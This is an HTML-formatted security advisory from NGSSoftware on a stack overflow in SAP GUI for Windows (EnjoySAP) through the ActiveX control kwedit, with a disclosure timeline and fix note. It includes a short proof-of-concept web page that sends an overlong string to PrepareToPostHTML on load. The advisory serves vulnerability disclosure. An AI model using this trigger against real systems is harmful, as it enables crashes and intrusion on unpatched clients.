<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<META http-equiv=Content-Type content="text/html; charset=iso-8859-1">
<META content="MSHTML 6.00.2900.3132" name=GENERATOR>
<STYLE></STYLE>
</HEAD>
<BODY bgColor=#ffffff>
<DIV><FONT face=Arial size=2>=======<BR>Summary<BR>=======<BR>Name: EnjoySAP,
SAP GUI for Windows - Stack Overflow<BR>Release Date: 5 July
2007<BR>Reference: NGS00483<BR>Discover: Mark Litchfield <<A
href="mailto:mark@ngssoftware.com">mark@ngssoftware.com</A>><BR>Vendor:
SAP<BR>Vendor Reference: SECRES-289<BR>Systems Affected: All Versions<BR>Risk:
High<BR>Status: Fixed</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=Arial
size=2>========<BR>TimeLine<BR>========<BR>Discovered: 4 January
2007<BR>Released: 19 January 2007<BR>Approved: 29 January 2007<BR>Reported: 11
January 2007<BR>Fixed: 18 May 2007<BR>Published: </FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=Arial
size=2>===========<BR>Description<BR>===========<BR>EnjoySAP, also know as Enjoy
is the most popular SAP GUI used today. The<BR>latest version can be
obtained from <A
href="ftp://ftp.sap.com/pub/sapgui/win/">ftp://ftp.sap.com/pub/sapgui/win/</A></FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=Arial size=2>When installing EnjoySAP, in appreciation of its
vast size for being a<BR>client (around 500MB), there are an astounding 1102
ActiveX controls<BR>installed.</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=Arial size=2>A relatively brief examinaton of these controls,
found a large number of<BR>instances that would terminate EnjoySAP process,
there were a number that<BR>could create files on the file system (there
unfortunately exists no<BR>ability to inject content into these created files)
and a number of<BR>bufferoverruns.</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=Arial size=2>=================<BR>Technical
Details<BR>=================<BR>Control - kweditcontrol.kwedit.1 (Marked Safe
For Scripting)</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=Arial size=2>Function - PrepareToPostHTML</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=Arial size=2>DLL Path - C:\Program
Files\SAP\FrontEnd\SapGui\kwedit.dll</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=Arial size=2>POC:</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=Arial size=2><HTML><BR><HEAD><BR><META
http-equiv=Content-Type content="text/html;
charset=windows-1252"><BR><SCRIPT
type=text/javascript><BR> <BR>function init()<BR>{<BR>var foo = "";
<BR> <BR>for(var icount = 0; icount < 1060; icount++)
<BR>{ <BR> foo = foo +
"x";<BR>}<BR>var ngssoftware;<BR>ngssoftware = new
ActiveXObject("kweditcontrol.kwedit.1");<BR> <BR>ngssoftware["PrepareToPostHTML"](foo);<BR>}<BR>//--><BR></SCRIPT><BR> <BR></HEAD><BR><BODY
bgColor=#ffffff onload=init()><BR></BODY></HTML></FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=Arial size=2>===============<BR>Fix
Information<BR>===============<BR>Please enrue you are running the latest
version</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=Arial size=2>NGSSoftware Insight Security Research<BR><A
href="http://www.ngssoftware.com/">http://www.ngssoftware.com/</A><BR><A
href="http://www.databasesecurity.com/">http://www.databasesecurity.com/</A><BR><A
href="http://www.nextgenss.com/">http://www.nextgenss.com/</A><BR>+44(0)208 401
0070 <BR></FONT></DIV></BODY></HTML>